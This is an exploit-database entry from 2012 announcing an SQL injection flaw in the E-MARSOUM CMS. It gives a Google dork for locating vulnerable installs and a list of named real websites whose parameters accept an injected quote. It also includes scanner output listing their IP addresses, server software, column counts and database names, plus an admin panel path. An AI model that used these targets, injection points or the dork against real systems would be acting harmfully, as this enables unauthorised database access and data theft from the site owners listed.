E-MARSOUM SQL Injection Vulnerability

2012-12-03T00:00:00
ID 1337DAY-ID-19861
Type zdt
Reporter Ramzi Null
Modified 2012-12-03T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
############################################################################
# [+] Exploit Title           : CMS MARSOUM SQLi Injection             [+] #
# [+] Date                    : 03/12/2012                             [+] #
# [+] Author                  : Ramzi Null [[email protected]]        [+] #
# [+] Facebook                : http://www.facebook.com/Ramzi.Pascal   [+] #
# [+] Vendor or Software Link : http://www.e-marsoum-international.com [+] #
# [+] Category                : Web Applications                       [+] #
# [+] Google dork             : intext:"Powered by E-MARSOUM"          [+] #
# [+] Vulnerability           : SQL Injection Vulnerability            [+] #
# [+] Tested On               : Windows 7 Professionnel                [+] #
############################################################################


[+] Demo:
===============================================================
http://www.elmazraa.com/display_news.php?id='
http://www.leroyaumedesenfants.net/display_news.php?id='
http://www.stn-tunisie.com/index.php?page=display_news&id='
http://assurance-upcar.com/detail_actu.php?id='
http://www.equipement-automotive.com/display_actu.php?id='
http://www.egs-tunisie.com/page.php?id='
http://www.softway-tunisie.com/offre.php?p='
http://www.itqan-consortium.com/display_project_ar.php?type='
===============================================================

[+]Demo Injections:

====================================================================
Analyzing http://www.elmazraa.com/display_news.php?id=68
Host IP: 193.95.75.138
Web Server: Apache/2.2.3 (Linux/SUSE)
Powered-by: PHP/5.2.9
Keyword Found: 02/01/2012
Injection type is String (')
Can't find db server type! But maybe there be some chances! [-o<
Selected Column Count is 7
Valid String Column is 2
DB Server: MySQL unknown ver
Target Vulnerable :D
Current DB: web20db2
====================================================================
Analyzing www.leroyaumedesenfants.net/display_news.php?id=33
Host IP: 67.19.134.135
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Keyword Found: vrai
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 5
Valid String Column is 2
Target Vulnerable :D
Current DB: royaume
====================================================================
Analyzing http://assurance-upcar.com/produits.php?id=107
Host IP: 67.19.134.135
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Keyword Found: conseil
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 4
Valid String Column is 3
Target Vulnerable :D
Current DB: upcar-db
====================================================================
Analyzing http://www.softway-tunisie.com/offre.php?p=45
Host IP: 67.19.134.135
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Keyword Found: 236px;
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable :D
Current DB: softwaydb
====================================================================
 
[+] Admin Cpanel:
======================================
http://www.site.com.tn/[path]/admin/
======================================
 
[+] Greetz to:
======================================================
: # Younes Injector(DZ) , Kais(Sengra) , Tn_Scorpion
           Yassine Owner, all muslim hackers ,
                    (ReDeYeF City ?)         
                   And All My Friends               #
======================================================

#  0day.today [2018-01-10]  #